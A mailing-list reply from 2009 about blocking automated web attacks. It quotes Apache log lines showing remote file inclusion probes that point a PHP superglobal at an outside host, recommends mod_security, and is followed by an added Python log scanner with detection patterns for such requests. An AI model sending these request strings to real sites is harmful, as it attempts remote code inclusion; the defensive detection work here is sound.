Re: Software, utility, or script to block automatically these cracker attacks

2009/8/5 Jose R R <jose.r.r@xxxxxxxxxxx>:
> Good day-
>
> Although I go through my logs fairly often and update my scripts on a
> regular basis, I still get cracker attacks like the ones sampled
> below:
>
> 222.122.6.62 - - [04/Aug/2009:08:09:52 -0700] "GET
> /blog/index.php/2008/06/02/os-2-warp-server-for-e-business-wseb-and?blog=4///?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/cgi/id.txt?%0D?
> HTTP/1.1" 400 567 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3;
> i686 Linux; 20020515)"
> 222.122.6.62 - - [04/Aug/2009:08:11:18 -0700] "GET
> /blog/index.php/2008/06/02///?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/cgi/id.txt?%0D?
> HTTP/1.1" 500 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
> rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
>
> I would appreciate suggestions to block automatically the above.  I am
> already using Fail2ban and some rules in IP tables.  Notwithstanding,
> those above manage to get through.
>
> Thanks in advance for any input.

If you are using Apache, the "authoritative" tool is mod_security, a
web application firewall.

With a simple set of rules you can drop these requests.

Hope this helps.

-- 
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
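
The match a blocking rule for these requests would have to make can be tried offline against an access log first. The following is an added example, not part of the original thread and not mod_security's own code: a Python scan of Apache combined-format lines for a PHP superglobal used as a request parameter. The log lines, addresses and host names in it are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Apache combined log format: client IP, request URI, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<uri>\S+)[^"]*" (?P<status>\d{3}) ')
# A PHP superglobal name used as a query parameter, e.g. ?_SERVER[DOCUMENT_ROOT]=
SUPERGLOBAL_RE = re.compile(
    r'[?&;](?:_(?:SERVER|GET|POST|COOKIE|REQUEST|ENV|FILES|SESSION)|GLOBALS)\[', re.I)
# A parameter value that is a remote URL (also seen alone on legitimate redirects).
REMOTE_VALUE_RE = re.compile(r'=(?:https?|ftp)://', re.I)

def decode(uri, rounds=3):
    """Percent-decode repeatedly so %5B and %255B both become '['."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri

def classify(uri):
    """Return the reasons, if any, that a request URI looks suspicious."""
    uri = decode(uri)
    reasons = []
    if SUPERGLOBAL_RE.search(uri):
        reasons.append("superglobal-param")
    if REMOTE_VALUE_RE.search(uri):
        reasons.append("remote-url-value")
    return reasons

def scan(lines):
    """Map client IP -> [(status, reasons)] for requests naming a superglobal."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if m and "superglobal-param" in (reasons := classify(m.group("uri"))):
            hits.setdefault(m.group("ip"), []).append((int(m.group("status")), reasons))
    return hits

# Constructed sample lines (documentation addresses, placeholder host names).
SAMPLE = [
    '203.0.113.7 - - [04/Aug/2009:08:09:52 -0700] "GET /blog/index.php/post?blog=4///?_SERVER[DOCUMENT_ROOT]=http://files.example.invalid/id.txt? HTTP/1.1" 400 567 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [04/Aug/2009:08:11:18 -0700] "GET /blog/index.php?_SERVER%5BDOCUMENT_ROOT%5D=http://files.example.invalid/id.txt? HTTP/1.1" 500 - "-" "Mozilla/5.0"',
    '198.51.100.20 - - [04/Aug/2009:08:12:01 -0700] "GET /blog/index.php?blog=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [04/Aug/2009:08:12:30 -0700] "GET /out.php?url=http://www.example.com/ HTTP/1.1" 302 - "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, found in scan(SAMPLE).items():
        print(ip, found)
```

Only the superglobal parameter name is treated as decisive; a remote URL as a value is recorded as a second reason because it also appears on ordinary redirect links.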
